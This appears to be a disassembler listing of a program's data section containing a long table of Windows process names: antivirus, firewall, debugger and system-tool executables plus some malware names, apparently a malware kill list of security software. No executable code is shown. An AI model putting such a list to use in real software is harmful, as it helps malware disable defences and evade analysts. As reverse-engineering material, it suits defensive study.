aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: .data:00432084�o
align 10h
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: .data:00432080�o
align 10h
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: .data:0043207C�o
dd 0
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: .data:00432078�o
align 4
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: .data:00432074�o
align 4
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: .data:00432070�o
align 4
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: .data:0043206C�o
align 4
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: .data:00432068�o
align 4
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .data:00432064�o
align 10h
dd 0
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: .data:00432060�o
dd 0
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .data:0043205C�o
align 4
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: .data:00432058�o
align 4
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: .data:00432054�o
dd 0
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: .data:00432050�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .data:0043204C�o
dd 0
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .data:00432048�o
align 10h
dd 0
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: .data:00432044�o
align 4
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: .data:00432040�o
dd 0
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .data:0043203C�o
align 10h
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: .data:00432038�o
dd 0
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: .data:00432034�o
align 4
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: .data:00432030�o
align 4
dd 0
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: .data:0043202C�o
align 4
dd 0
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: .data:00432028�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: .data:00432024�o
dd 0
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: .data:00432020�o
align 4
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: .data:0043201C�o
align 4
dd 0
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: .data:00432018�o
align 4
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: .data:00432014�o
align 8
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: .data:00432010�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: .data:0043200C�o
align 4
dd 0
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: .data:00432008�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: .data:00432004�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: .data:00432000�o
align 4
dd 0
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: .data:00431FFC�o
align 4
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: .data:00431FF8�o
align 8
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: .data:00431FF4�o
align 4
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: .data:00431FF0�o
align 4
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: .data:00431FEC�o
align 8
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: .data:00431FE8�o
align 8
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: .data:00431FE4�o
align 10h
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: .data:00431FE0�o
align 10h
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: .data:00431FDC�o
align 10h
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: .data:00431FD8�o
align 10h
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: .data:00431FD4�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: .data:00431FD0�o
align 4
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: .data:00431FCC�o
align 4
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: .data:00431FC8�o
align 4
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: .data:00431FC4�o
dd 2 dup(0)
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: .data:00431FC0�o
align 4
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: .data:00431FBC�o
dd 0
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: .data:00431FB8�o
dd 0
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: .data:00431FB4�o
align 4
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: .data:00431FB0�o
align 4
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: .data:00431FAC�o
dd 0
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: .data:00431FA8�o
align 4
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: .data:00431FA4�o
dd 0
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: .data:00431FA0�o
align 10h
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: .data:00431F9C�o
align 10h
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: .data:00431F98�o
align 10h
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: .data:00431F94�o
align 10h
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: .data:00431F90�o
align 10h
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: .data:00431F88�o
; .data:00431F8C�o
align 10h
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .data:00431F84�o
align 4
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: .data:00431F80�o
align 4
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: .data:00431F7C�o
align 4
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: .data:00431F78�o
align 4
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: .data:00431F74�o
dd 0
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: .data:00431F70�o
align 8
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: .data:00431F6C�o
align 4
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: .data:00431F68�o
align 8
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: .data:00431F64�o
align 4
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: .data:00431F60�o
align 8
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: .data:00431F5C�o
align 4
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: .data:00431F58�o
align 8
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: .data:00431F54�o
align 4
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: .data:00431F50�o
align 10h
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: .data:00431F4C�o
align 4
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: .data:00431F48�o
dd 0
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: .data:00431F44�o
dd 0
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: .data:00431F40�o
dd 0
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: .data:00431F3C�o
align 4
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: .data:00431F38�o
dd 0
aTca_exe db 'TCA.EXE',0 ; DATA XREF: .data:00431F34�o
align 10h
aTc_exe db 'TC.EXE',0 ; DATA XREF: .data:00431F30�o
align 4
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: .data:00431F2C�o
align 8
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: .data:00431F28�o
align 8
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: .data:00431F24�o
align 8
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: .data:00431F20�o
align 8
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: .data:00431F1C�o
align 8
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .data:00431F18�o
align 8
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .data:00431F14�o
align 4
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .data:00431F10�o
align 8
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: .data:00431F0C�o
align 8
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: .data:00431F08�o
align 8
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: .data:00431F04�o
dd 0
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: .data:00431F00�o
align 10h
dd 2 dup(0)
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: .data:00431EFC�o
align 8
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .data:00431EF8�o
align 8
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .data:00431EF4�o
align 4
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .data:00431EF0�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .data:00431EEC�o
dd 0
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: .data:00431EE8�o
align 8
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: .data:00431EE4�o
align 8
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: .data:00431EE0�o
align 8
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: .data:00431EDC�o
align 4
aStart_exe db 'START.EXE',0 ; DATA XREF: .data:00431ED8�o
align 4
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: .data:00431ED4�o
align 10h
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: .data:00431ED0�o
align 10h
aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: .data:00431ECC�o
align 10h
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: .data:00431EC8�o
align 10h
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: .data:00431EC4�o
align 4
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: .data:00431EC0�o
align 4
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: .data:00431EBC�o
align 4
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: .data:00431EB8�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: .data:00431EB4�o
dd 0
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: .data:00431EB0�o
align 10h
dd 0
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: .data:00431EAC�o
align 10h
dd 0
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: .data:00431EA8�o
align 10h
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: .data:00431EA4�o
align 4
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: .data:00431EA0�o
align 4
aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: .data:00431E9C�o
align 4
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: .data:00431E98�o
align 10h
dd 0
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .data:00431E94�o
align 10h
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: .data:00431E90�o
dd 0
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: .data:00431E8C�o
align 10h
aShn_exe db 'SHN.EXE',0 ; DATA XREF: .data:00431E88�o
dd 0
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: .data:00431E84�o
dd 0
aSh_exe db 'SH.EXE',0 ; DATA XREF: .data:00431E80�o
align 4
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: .data:00431E7C�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: .data:00431E78�o
align 8
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: .data:00431E74�o
align 8
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: .data:00431E70�o
align 10h
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .data:00431E6C�o
align 10h
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .data:00431E68�o
align 10h
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .data:00431E64�o
align 10h
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: .data:00431E60�o
align 10h
aSd_exe db 'SD.EXE',0 ; DATA XREF: .data:00431E5C�o
align 4
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: .data:00431E58�o
align 8
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: .data:00431E54�o
align 8
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: .data:00431E50�o
align 8
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: .data:00431E4C�o
align 8
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: .data:00431E48�o
align 8
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: .data:00431E44�o
align 8
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: .data:00431E40�o
align 8
aSc_exe db 'SC.EXE',0 ; DATA XREF: .data:00431E3C�o
align 10h
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: .data:00431E38�o
align 10h
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: .data:00431E34�o
align 10h
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: .data:00431E30�o
align 4
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: .data:00431E2C�o
align 4
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: .data:00431E28�o
dd 0
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: .data:00431E24�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .data:00431E20�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .data:00431E1C�o
align 4
dd 0
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: .data:00431E18�o
align 4
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: .data:00431E14�o
align 4
aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: .data:00431E10�o
align 4
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: .data:00431E0C�o
dd 0
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: .data:00431E08�o
align 4
dd 0
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: .data:00431E04�o
dd 0
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: .data:00431E00�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: .data:00431DFC�o
align 4
dd 0
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: .data:00431DF8�o
align 4
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: .data:00431DF4�o
dd 0
aReged_exe db 'REGED.EXE',0 ; DATA XREF: .data:00431DF0�o
align 4
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: .data:00431DEC�o
align 8
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: .data:00431DE8�o
align 8
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: .data:00431DE4�o
align 4
aRay_exe db 'RAY.EXE',0 ; DATA XREF: .data:00431DE0�o
align 10h
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: .data:00431DDC�o
align 4
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: .data:00431DD8�o
dd 0
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: .data:00431DD4�o
align 10h
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: .data:00431DD0�o
align 10h
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: .data:00431DCC�o
align 10h
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: .data:00431DC8�o
align 10h
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: .data:00431DC4�o
align 10h
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: .data:00431DC0�o
align 4
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: .data:00431DBC�o
align 4
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: .data:00431DB8�o
align 4
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: .data:00431DB4�o
align 4
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: .data:00431DB0�o
dd 0
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: .data:00431DAC�o
align 4
dd 0
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: .data:00431DA8�o
align 8
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: .data:00431DA4�o
align 10h
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .data:00431DA0�o
align 10h
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: .data:00431D9C�o
align 4
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: .data:00431D98�o
align 4
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: .data:00431D94�o
dd 0
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: .data:00431D90�o
dd 0
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: .data:00431D8C�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: .data:00431D88�o
align 4
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: .data:00431D84�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: .data:00431D80�o
dd 0
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: .data:00431D7C�o
align 10h
dd 0
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: .data:00431D78�o
dd 0
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: .data:00431D74�o
dd 0
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: .data:00431D70�o
align 4
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: .data:00431D6C�o
align 10h
dd 0
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: .data:00431D68�o
align 4
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: .data:00431D64�o
align 4
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: .data:00431D60�o
align 4
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: .data:00431D5C�o
align 10h
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: .data:00431D58�o
align 10h
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: .data:00431D54�o
align 10h
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: .data:00431D50�o
align 10h
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: .data:00431D4C�o
align 4
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: .data:00431D48�o
dd 0
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: .data:00431D44�o
align 4
dd 0
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: .data:00431D40�o
align 10h
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: .data:00431D3C�o
dd 0
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: .data:00431D38�o
align 4
aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: .data:00431D34�o
align 4
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: .data:00431D30�o
align 4
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: .data:00431D2C�o
align 4
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: .data:00431D28�o
align 4
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: .data:00431D24�o
align 4
dd 0
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: .data:00431D20�o
align 10h
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: .data:00431D1C�o
align 4
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: .data:00431D18�o
align 4
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: .data:00431D14�o
align 4
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: .data:00431D10�o
align 4
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: .data:00431D0C�o
align 4
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: .data:00431D08�o
align 10h
dd 0
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: .data:00431D04�o
align 10h
dd 0
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: .data:00431D00�o
align 10h
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: .data:00431CFC�o
align 8
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: .data:00431CF4�o
; .data:00431CF8�o
align 8
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: .data:00431CF0�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: .data:00431CEC�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: .data:00431CE8�o
align 4
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: .data:00431CE4�o
align 10h
dd 0
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: .data:00431CE0�o
dd 0
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: .data:00431CDC�o
align 4
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: .data:00431CD8�o
align 4
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: .data:00431CD4�o
dd 0
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: .data:00431CD0�o
dd 0
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: .data:00431CCC�o
align 10h
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: .data:00431CC8�o
align 10h
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: .data:00431CC0�o
; .data:00431CC4�o
align 10h
aNui_exe db 'NUI.EXE',0 ; DATA XREF: .data:00431CBC�o
dd 0
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: .data:00431CB8�o
align 4
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: .data:00431CB4�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: .data:00431CB0�o
align 4
aNt_exe db 'NT.EXE',0 ; DATA XREF: .data:00431CAC�o
align 10h
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: .data:00431CA8�o
align 10h
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: .data:00431CA4�o
align 10h
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: .data:00431CA0�o
align 10h
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: .data:00431C9C�o
align 10h
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: .data:00431C98�o
align 10h
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: .data:00431C94�o
align 10h
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: .data:00431C90�o
align 10h
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: .data:00431C8C�o
align 4
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: .data:00431C88�o
align 10h
dd 0
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: .data:00431C84�o
align 4
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: .data:00431C80�o
align 4
dd 0
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: .data:00431C7C�o
dd 0
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: .data:00431C78�o
align 4
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: .data:00431C74�o
align 4
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: .data:00431C70�o
align 10h
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: .data:00431C6C�o
align 10h
aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: .data:00431C68�o
align 10h
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: .data:00431C64�o
align 10h
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: .data:00431C60�o
align 4
dd 0
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: .data:00431C5C�o
align 10h
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: .data:00431C58�o
align 10h
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: .data:00431C54�o
align 10h
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: .data:00431C50�o
align 10h
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: .data:00431C4C�o
align 10h
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: .data:00431C48�o
dd 0
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: .data:00431C44�o
align 8
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: .data:00431C40�o
align 4
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: .data:00431C3C�o
dd 0
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: .data:00431C38�o
align 10h
dd 0
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: .data:00431C34�o
align 10h
dd 0
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: .data:00431C30�o
align 10h
dd 0
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: .data:00431C2C�o
dd 0
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: .data:00431C28�o
align 10h
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: .data:00431C24�o
align 10h
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: .data:00431C20�o
align 10h
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: .data:00431C1C�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: .data:00431C18�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: .data:00431C14�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: .data:00431C10�o
align 10h
dd 0
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: .data:00431C0C�o
align 10h
dd 0
aNav_exe db 'NAV.EXE',0 ; DATA XREF: .data:00431C08�o
align 10h
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: .data:00431C04�o
align 10h
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: .data:00431C00�o
align 10h
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: .data:00431BFC�o
align 10h
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: .data:00431BF8�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: .data:00431BF4�o
align 4
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: .data:00431BF0�o
align 4
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: .data:00431BEC�o
align 4
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: .data:00431BE8�o
align 4
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .data:00431BE4�o
dd 0
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: .data:00431BE0�o
align 4
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: .data:00431BDC�o
align 4
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: .data:00431BD8�o
align 10h
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: .data:00431BD4�o
align 4
aMsconfig_exe db 'MSCONFIG.EXE',0 ; DATA XREF: .data:00431BD0�o
align 4
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: .data:00431BCC�o
align 4
dd 0
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: .data:00431BC8�o
dd 0
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: .data:00431BC4�o
dd 0
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .data:00431BC0�o
dd 0
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: .data:00431BBC�o
align 4
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: .data:00431BB8�o
